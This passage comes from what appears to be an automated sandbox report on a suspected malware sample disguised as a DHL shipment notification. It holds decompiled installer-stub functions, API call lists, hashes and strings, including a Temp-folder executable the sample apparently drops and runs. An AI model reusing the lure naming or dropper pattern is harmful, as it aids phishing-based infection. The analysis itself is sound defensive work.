                        							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                        							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                        							_v12 = _t103;
                        							_v16 = _t113;
                        							_v8 = 0x7a6a40;
                        							if(_t103 - _t113 < 0x800) {
                        								SendMessageW(_t56, 0x44b, 0,  &_v16);
                        								SetCursor(LoadCursorW(0, 0x7f02));
                        								_push(1);
                        								_t44 =  &_v8; // 0x7a6a40
                        								E00404A38(_a4,  *_t44);
                        								SetCursor(LoadCursorW(0, 0x7f00));
                        								_t114 = _a16;
                        							}
                        						}
                        						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                        							goto L28;
                        						} else {
                        							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                        								SendMessageW( *0x7a8aa8, 0x111, 1, 0);
                        							}
                        							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                        								SendMessageW( *0x7a8aa8, 0x10, 0, 0);
                        							}
                        							return 1;
                        						}
                        					}
                        					if(_a12 >> 0x10 != 0 ||  *0x79ff54 != 0) {
                        						goto L27;
                        					} else {
                        						_t116 =  *0x7a0f60 + 0x14;
                        						if(( *_t116 & 0x00000020) == 0) {
                        							goto L27;
                        						}
                        						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                        						E004045EC(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                        						E00404A14();
                        						goto L13;
                        					}
                        				}
                        				_t117 = _a16;
                        				_t75 =  *(_t117 + 0x30);
                        				if(_t75 < 0) {
                        					_t75 =  *( *0x7a7a7c - 4 + _t75 * 4);
                        				}
                        				_t76 =  *0x7a8ad8 + _t75 * 2;
                        				_t110 =  *_t76 & 0x0000ffff;
                        				_a8 = _t110;
                        				_t78 =  &(_t76[1]);
                        				_a16 = _t78;
                        				_v16 = _t78;
                        				_v12 = 0;
                        				_v8 = E0040473A;
                        				if(_t110 != 2) {
                        					_v8 = E00404700;
                        				}
                        				_push( *((intOrPtr*)(_t117 + 0x34)));
                        				_push(0x22);
                        				E004045CA(_a4);
                        				_push( *((intOrPtr*)(_t117 + 0x38)));
                        				_push(0x23);
                        				E004045CA(_a4);
                        				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                        				E004045EC( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                        				_t118 = GetDlgItem(_a4, 0x3e8);
                        				E004045FF(_t118);
                        				SendMessageW(_t118, 0x45b, 1, 0);
                        				_t92 =  *( *0x7a8ab0 + 0x68);
                        				if(_t92 < 0) {
                        					_t92 = GetSysColor( ~_t92);
                        				}
                        				SendMessageW(_t118, 0x443, 0, _t92);
                        				SendMessageW(_t118, 0x445, 0, 0x4010000);
                        				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                        				 *0x79ff54 = 0;
                        				SendMessageW(_t118, 0x449, _a8,  &_v16);
                        				 *0x79ff54 = 0;
                        				return 0;
                        			}

                        APIs
                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404827
                        • GetDlgItem.USER32 ref: 0040483B
                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404858
                        • GetSysColor.USER32(?), ref: 00404869
                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404877
                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404885
                        • lstrlenW.KERNEL32(?), ref: 0040488A
                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404897
                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048AC
                        • GetDlgItem.USER32 ref: 00404905
                        • SendMessageW.USER32(00000000), ref: 0040490C
                        • GetDlgItem.USER32 ref: 00404937
                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040497A
                        • LoadCursorW.USER32(00000000,00007F02), ref: 00404988
                        • SetCursor.USER32(00000000), ref: 0040498B
                        • LoadCursorW.USER32(00000000,00007F00), ref: 004049A4
                        • SetCursor.USER32(00000000), ref: 004049A7
                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D6
                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                        • String ID: @jz$N
                        • API String ID: 3103080414-4087404676
                        • Opcode ID: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
                        • Instruction ID: a92c684f90d09e790cb96c84d129e3e4002e0b0c6609d0ca9bf02dd30757374c
                        • Opcode Fuzzy Hash: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
                        • Instruction Fuzzy Hash: D861A2B1900209BFDB109F61DD85AAA7BA9FB85315F00803AF705B62E1C77C9D51DF98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004062B4(void* __ecx) {
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				long _t12;
                        				long _t24;
                        				char* _t31;
                        				int _t37;
                        				void* _t38;
                        				intOrPtr* _t39;
                        				long _t42;
                        				WCHAR* _t44;
                        				void* _t46;
                        				void* _t48;
                        				void* _t49;
                        				void* _t52;
                        				void* _t53;
                        
                        				_t38 = __ecx;
                        				_t44 =  *(_t52 + 0x14);
                        				 *0x7a5628 = 0x55004e;
                        				 *0x7a562c = 0x4c;
                        				if(_t44 == 0) {
                        					L3:
                        					_t2 = _t52 + 0x1c; // 0x7a5e28
                        					_t12 = GetShortPathNameW( *_t2, 0x7a5e28, 0x400);
                        					if(_t12 != 0 && _t12 <= 0x400) {
                        						_t37 = wsprintfA(0x7a5228, "%ls=%ls\r\n", 0x7a5628, 0x7a5e28);
                        						_t53 = _t52 + 0x10;
                        						E004066AB(_t37, 0x400, 0x7a5e28, 0x7a5e28,  *((intOrPtr*)( *0x7a8ab0 + 0x128)));
                        						_t12 = E0040615E(0x7a5e28, 0xc0000000, 4);
                        						_t48 = _t12;
                        						 *(_t53 + 0x18) = _t48;
                        						if(_t48 != 0xffffffff) {
                        							_t42 = GetFileSize(_t48, 0);
                        							_t6 = _t37 + 0xa; // 0xa
                        							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                        							if(_t46 == 0 || E004061E1(_t48, _t46, _t42) == 0) {
                        								L18:
                        								return CloseHandle(_t48);
                        							} else {
                        								if(E004060C3(_t38, _t46, "[Rename]\r\n") != 0) {
                        									_t49 = E004060C3(_t38, _t21 + 0xa, "\n[");
                        									if(_t49 == 0) {
                        										_t48 =  *(_t53 + 0x18);
                        										L16:
                        										_t24 = _t42;
                        										L17:
                        										E00406119(_t24 + _t46, 0x7a5228, _t37);
                        										SetFilePointer(_t48, 0, 0, 0);
                        										E00406210(_t48, _t46, _t42 + _t37);
                        										GlobalFree(_t46);
                        										goto L18;
                        									}
                        									_t39 = _t46 + _t42;
                        									_t31 = _t39 + _t37;
                        									while(_t39 > _t49) {
                        										 *_t31 =  *_t39;
                        										_t31 = _t31 - 1;
                        										_t39 = _t39 - 1;
                        									}
                        									_t24 = _t49 - _t46 + 1;
                        									_t48 =  *(_t53 + 0x18);
                        									goto L17;
                        								}
                        								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                        								_t42 = _t42 + 0xa;
                        								goto L16;
                        							}
                        						}
                        					}
                        				} else {
                        					CloseHandle(E0040615E(_t44, 0, 1));
                        					_t12 = GetShortPathNameW(_t44, 0x7a5628, 0x400);
                        					if(_t12 != 0 && _t12 <= 0x400) {
                        						goto L3;
                        					}
                        				}
                        				return _t12;
                        			}

                        APIs
                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040644F,?,?), ref: 004062EF
                        • GetShortPathNameW.KERNEL32 ref: 004062F8
                          • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
                          • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
                        • GetShortPathNameW.KERNEL32 ref: 00406315
                        • wsprintfA.USER32 ref: 00406333
                        • GetFileSize.KERNEL32(00000000,00000000,007A5E28,C0000000,00000004,007A5E28,?,?,?,?,?), ref: 0040636E
                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040637D
                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063B5
                        • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,007A5228,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040640B
                        • GlobalFree.KERNEL32 ref: 0040641C
                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406423
                          • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,80000000,00000003), ref: 00406162
                          • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                        • String ID: %ls=%ls$(Vz$(^z$(^z$[Rename]
                        • API String ID: 2171350718-2000197835
                        • Opcode ID: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
                        • Instruction ID: 6cadb61bc7003589c9facc341004653e1fa6c0793f9c109ef5d6a16b2289e69d
                        • Opcode Fuzzy Hash: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
                        • Instruction Fuzzy Hash: 2D313571600705BBD2206B669D48F1B3A9CEF85714F16003EFD42FA2C2DA7DD82586BD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 90%
                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                        				struct tagLOGBRUSH _v16;
                        				struct tagRECT _v32;
                        				struct tagPAINTSTRUCT _v96;
                        				struct HDC__* _t70;
                        				struct HBRUSH__* _t87;
                        				struct HFONT__* _t94;
                        				long _t102;
                        				signed int _t126;
                        				struct HDC__* _t128;
                        				intOrPtr _t130;
                        
                        				if(_a8 == 0xf) {
                        					_t130 =  *0x7a8ab0;
                        					_t70 = BeginPaint(_a4,  &_v96);
                        					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                        					_a8 = _t70;
                        					GetClientRect(_a4,  &_v32);
                        					_t126 = _v32.bottom;
                        					_v32.bottom = _v32.bottom & 0x00000000;
                        					while(_v32.top < _t126) {
                        						_a12 = _t126 - _v32.top;
                        						asm("cdq");
                        						asm("cdq");
                        						asm("cdq");
                        						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                        						_t87 = CreateBrushIndirect( &_v16);
                        						_v32.bottom = _v32.bottom + 4;
                        						_a16 = _t87;
                        						FillRect(_a8,  &_v32, _t87);
                        						DeleteObject(_a16);
                        						_v32.top = _v32.top + 4;
                        					}
                        					if( *(_t130 + 0x58) != 0xffffffff) {
                        						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                        						_a16 = _t94;
                        						if(_t94 != 0) {
                        							_t128 = _a8;
                        							_v32.left = 0x10;
                        							_v32.top = 8;
                        							SetBkMode(_t128, 1);
                        							SetTextColor(_t128,  *(_t130 + 0x58));
                        							_a8 = SelectObject(_t128, _a16);
                        							DrawTextW(_t128, 0x7a7aa0, 0xffffffff,  &_v32, 0x820);
                        							SelectObject(_t128, _a8);
                        							DeleteObject(_a16);
                        						}
                        					}
                        					EndPaint(_a4,  &_v96);
                        					return 0;
                        				}
                        				_t102 = _a16;
                        				if(_a8 == 0x46) {
                        					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                        					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8aa8;
                        				}
                        				return DefWindowProcW(_a4, _a8, _a12, _t102);
                        			}

                        APIs
                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                        • BeginPaint.USER32(?,?), ref: 00401047
                        • GetClientRect.USER32 ref: 0040105B
                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                        • FillRect.USER32 ref: 004010E4
                        • DeleteObject.GDI32(?), ref: 004010ED
                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                        • SelectObject.GDI32(00000000,?), ref: 00401140
                        • DrawTextW.USER32(00000000,007A7AA0,000000FF,00000010,00000820), ref: 00401156
                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                        • DeleteObject.GDI32(?), ref: 00401165
                        • EndPaint.USER32(?,?), ref: 0040116E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                        • String ID: F
                        • API String ID: 941294808-1304234792
                        • Opcode ID: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
                        • Instruction ID: 97a6e5849d711934decb320d9e1447055a7c39d586dd296ee09aa65e352ff849
                        • Opcode Fuzzy Hash: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
                        • Instruction Fuzzy Hash: 83418C71800209AFCF058F95CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 72%
                        			E004066AB(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                        				struct _ITEMIDLIST* _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				signed int _v28;
                        				signed int _t44;
                        				WCHAR* _t45;
                        				signed char _t47;
                        				signed int _t48;
                        				short _t59;
                        				short _t61;
                        				short _t63;
                        				void* _t71;
                        				signed int _t77;
                        				signed int _t78;
                        				short _t81;
                        				short _t82;
                        				signed char _t84;
                        				signed int _t85;
                        				void* _t98;
                        				void* _t104;
                        				intOrPtr* _t105;
                        				void* _t107;
                        				WCHAR* _t108;
                        				void* _t110;
                        
                        				_t107 = __esi;
                        				_t104 = __edi;
                        				_t71 = __ebx;
                        				_t44 = _a8;
                        				if(_t44 < 0) {
                        					_t44 =  *( *0x7a7a7c - 4 + _t44 * 4);
                        				}
                        				_push(_t71);
                        				_push(_t107);
                        				_push(_t104);
                        				_t105 =  *0x7a8ad8 + _t44 * 2;
                        				_t45 = 0x7a6a40;
                        				_t108 = 0x7a6a40;
                        				if(_a4 >= 0x7a6a40 && _a4 - 0x7a6a40 >> 1 < 0x800) {
                        					_t108 = _a4;
                        					_a4 = _a4 & 0x00000000;
                        				}
                        				_t81 =  *_t105;
                        				_a8 = _t81;
                        				if(_t81 == 0) {
                        					L43:
                        					 *_t108 =  *_t108 & 0x00000000;
                        					if(_a4 == 0) {
                        						return _t45;
                        					}
                        					return E0040666E(_a4, _t45);
                        				} else {
                        					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                        						_t98 = 2;
                        						_t105 = _t105 + _t98;
                        						if(_t81 >= 4) {
                        							if(__eflags != 0) {
                        								 *_t108 = _t81;
                        								_t108 = _t108 + _t98;
                        								__eflags = _t108;
                        							} else {
                        								 *_t108 =  *_t105;
                        								_t108 = _t108 + _t98;
                        								_t105 = _t105 + _t98;
                        							}
                        							L42:
                        							_t82 =  *_t105;
                        							_a8 = _t82;
                        							if(_t82 != 0) {
                        								_t81 = _a8;
                        								continue;
                        							}
                        							goto L43;
                        						}
                        						_t84 =  *((intOrPtr*)(_t105 + 1));
                        						_t47 =  *_t105;
                        						_t48 = _t47 & 0x000000ff;
                        						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                        						_t85 = _t84 & 0x000000ff;
                        						_v28 = _t48 | 0x00008000;
                        						_t77 = 2;
                        						_v16 = _t85;
                        						_t105 = _t105 + _t77;
                        						_v24 = _t48;
                        						_v20 = _t85 | 0x00008000;
                        						if(_a8 != _t77) {
                        							__eflags = _a8 - 3;
                        							if(_a8 != 3) {
                        								__eflags = _a8 - 1;
                        								if(__eflags == 0) {
                        									__eflags = (_t48 | 0xffffffff) - _v12;
                        									E004066AB(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                        								}
                        								L38:
                        								_t108 =  &(_t108[lstrlenW(_t108)]);
                        								_t45 = 0x7a6a40;
                        								goto L42;
                        							}
                        							_t78 = _v12;
                        							__eflags = _t78 - 0x1d;
                        							if(_t78 != 0x1d) {
                        								__eflags = (_t78 << 0xb) + 0x7a9000;
                        								E0040666E(_t108, (_t78 << 0xb) + 0x7a9000);
                        							} else {
                        								E004065B5(_t108,  *0x7a8aa8);
                        							}
                        							__eflags = _t78 + 0xffffffeb - 7;
                        							if(__eflags < 0) {
                        								L29:
                        								E004068F5(_t108);
                        							}
                        							goto L38;
                        						}
                        						if( *0x7a8b24 != 0) {
                        							_t77 = 4;
                        						}
                        						_t121 = _t48;
                        						if(_t48 >= 0) {
                        							__eflags = _t48 - 0x25;
                        							if(_t48 != 0x25) {
                        								__eflags = _t48 - 0x24;
                        								if(_t48 == 0x24) {
                        									GetWindowsDirectoryW(_t108, 0x400);
                        									_t77 = 0;
                        								}
                        								while(1) {
                        									__eflags = _t77;
                        									if(_t77 == 0) {
                        										goto L26;
                        									}
                        									_t59 =  *0x7a8aa4;
                        									_t77 = _t77 - 1;
                        									__eflags = _t59;
                        									if(_t59 == 0) {
                        										L22:
                        										_t61 = SHGetSpecialFolderLocation( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                        										__eflags = _t61;
                        										if(_t61 != 0) {
                        											L24:
                        											 *_t108 =  *_t108 & 0x00000000;
                        											__eflags =  *_t108;
                        											continue;
                        										}
                        										__imp__SHGetPathFromIDListW(_v8, _t108);
                        										_a8 = _t61;
                        										__imp__CoTaskMemFree(_v8);
                        										__eflags = _a8;
                        										if(_a8 != 0) {
                        											goto L26;
                        										}
                        										goto L24;
                        									}
                        									_t63 =  *_t59( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                        									__eflags = _t63;
                        									if(_t63 == 0) {
                        										goto L26;
                        									}
                        									goto L22;
                        								}
                        								goto L26;
                        							}
                        							GetSystemDirectoryW(_t108, 0x400);
                        							goto L26;
                        						} else {
                        							E0040653C( *0x7a8ad8, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8ad8 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                        							if( *_t108 != 0) {
                        								L27:
                        								if(_v16 == 0x1a) {
                        									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                        								}
                        								goto L29;
                        							}
                        							E004066AB(_t77, _t105, _t108, _t108, _v16);
                        							L26:
                        							if( *_t108 == 0) {
                        								goto L29;
                        							}
                        							goto L27;
                        						}
                        					}
                        					goto L43;
                        				}
                        			}

                        APIs
                        • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,00000400), ref: 004067C6
                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,00000400,00000000,007A0F68,?,00405707,007A0F68,00000000,00000000,00000000,00000000), ref: 004067D9
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Directory$SystemWindowslstrcatlstrlen
                        • String ID: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                        • API String ID: 4260037668-4144669903
                        • Opcode ID: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
                        • Instruction ID: c9eaf07520507b798c7259a568fd9567d3c8f5a418c476a208567326fda18bee
                        • Opcode Fuzzy Hash: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
                        • Instruction Fuzzy Hash: F061FF72902115AADF10AF68CC40BAE37A5AF55314F22C03FE947B62D0DB3D49A5CB89
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00404631(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                        				struct tagLOGBRUSH _v16;
                        				long _t39;
                        				long _t41;
                        				void* _t44;
                        				signed char _t50;
                        				long* _t54;
                        
                        				if(_a4 + 0xfffffecd > 5) {
                        					L18:
                        					return 0;
                        				}
                        				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                        				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                        					goto L18;
                        				} else {
                        					_t50 = _t54[5];
                        					if((_t50 & 0xffffffe0) != 0) {
                        						goto L18;
                        					}
                        					_t39 =  *_t54;
                        					if((_t50 & 0x00000002) != 0) {
                        						_t39 = GetSysColor(_t39);
                        					}
                        					if((_t54[5] & 0x00000001) != 0) {
                        						SetTextColor(_a8, _t39);
                        					}
                        					SetBkMode(_a8, _t54[4]);
                        					_t41 = _t54[1];
                        					_v16.lbColor = _t41;
                        					if((_t54[5] & 0x00000008) != 0) {
                        						_t41 = GetSysColor(_t41);
                        						_v16.lbColor = _t41;
                        					}
                        					if((_t54[5] & 0x00000004) != 0) {
                        						SetBkColor(_a8, _t41);
                        					}
                        					if((_t54[5] & 0x00000010) != 0) {
                        						_v16.lbStyle = _t54[2];
                        						_t44 = _t54[3];
                        						if(_t44 != 0) {
                        							DeleteObject(_t44);
                        						}
                        						_t54[3] = CreateBrushIndirect( &_v16);
                        					}
                        					return _t54[3];
                        				}
                        			}

                        APIs
                        • GetWindowLongW.USER32(?,000000EB), ref: 0040464E
                        • GetSysColor.USER32(00000000), ref: 0040468C
                        • SetTextColor.GDI32(?,00000000), ref: 00404698
                        • SetBkMode.GDI32(?,?), ref: 004046A4
                        • GetSysColor.USER32(?), ref: 004046B7
                        • SetBkColor.GDI32(?,?), ref: 004046C7
                        • DeleteObject.GDI32(?), ref: 004046E1
                        • CreateBrushIndirect.GDI32(?), ref: 004046EB
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                        • String ID:
                        • API String ID: 2320649405-0
                        • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                        • Instruction ID: 80d2dfdfbb5be5877469216c844a522b7394a6fa1e0a99176855ee87e7478973
                        • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                        • Instruction Fuzzy Hash: EC2179B15007049BC730DF68D908B5BBBF8AF41714F048E2EE9D6A26E1E739D944DB68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                        				intOrPtr _t65;
                        				intOrPtr _t66;
                        				intOrPtr _t72;
                        				void* _t76;
                        				void* _t79;
                        
                        				_t72 = __edx;
                        				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                        				_t65 = 2;
                        				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                        				_t66 = E00402D84(_t65);
                        				_t79 = _t66 - 1;
                        				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                        				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                        				if(_t79 < 0) {
                        					L36:
                        					 *0x7a8b28 =  *0x7a8b28 +  *(_t76 - 4);
                        				} else {
                        					__ecx = 0x3ff;
                        					if(__eax > 0x3ff) {
                        						 *(__ebp - 0x44) = 0x3ff;
                        					}
                        					if( *__edi == __bx) {
                        						L34:
                        						__ecx =  *(__ebp - 0xc);
                        						__eax =  *(__ebp - 8);
                        						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                        						if(_t79 == 0) {
                        							 *(_t76 - 4) = 1;
                        						}
                        						goto L36;
                        					} else {
                        						 *(__ebp - 0x38) = __ebx;
                        						 *(__ebp - 0x18) = E004065CE(__ecx, __edi);
                        						if( *(__ebp - 0x44) > __ebx) {
                        							do {
                        								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                        									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040623F( *(__ebp - 0x18), __ebx) >= 0) {
                        										__eax = __ebp - 0x50;
                        										if(E004061E1( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                        											goto L34;
                        										} else {
                        											goto L21;
                        										}
                        									} else {
                        										goto L34;
                        									}
                        								} else {
                        									__eax = __ebp - 0x40;
                        									_push(__ebx);
                        									_push(__ebp - 0x40);
                        									__eax = 2;
                        									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                        									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                        									if(__eax == 0) {
                        										goto L34;
                        									} else {
                        										__ecx =  *(__ebp - 0x40);
                        										if(__ecx == __ebx) {
                        											goto L34;
                        										} else {
                        											__ax =  *(__ebp + 0xa) & 0x000000ff;
                        											 *(__ebp - 0x4c) = __ecx;
                        											 *(__ebp - 0x50) = __eax;
                        											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                        												L28:
                        												__ax & 0x0000ffff = E004065B5( *(__ebp - 0xc), __ax & 0x0000ffff);
                        											} else {
                        												__ebp - 0x50 = __ebp + 0xa;
                        												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                        													L21:
                        													__eax =  *(__ebp - 0x50);
                        												} else {
                        													__edi =  *(__ebp - 0x4c);
                        													__edi =  ~( *(__ebp - 0x4c));
                        													while(1) {
                        														_t22 = __ebp - 0x40;
                        														 *_t22 =  *(__ebp - 0x40) - 1;
                        														__eax = 0xfffd;
                        														 *(__ebp - 0x50) = 0xfffd;
                        														if( *_t22 == 0) {
                        															goto L22;
                        														}
                        														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                        														__edi = __edi + 1;
                        														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                        														__eax = __ebp + 0xa;
                        														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                        															continue;
                        														} else {
                        															goto L21;
                        														}
                        														goto L22;
                        													}
                        												}
                        												L22:
                        												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                        													goto L28;
                        												} else {
                        													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                        														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                        															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                        															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                        														} else {
                        															__ecx =  *(__ebp - 0xc);
                        															__edx =  *(__ebp - 8);
                        															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                        															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                        														}
                        														goto L34;
                        													} else {
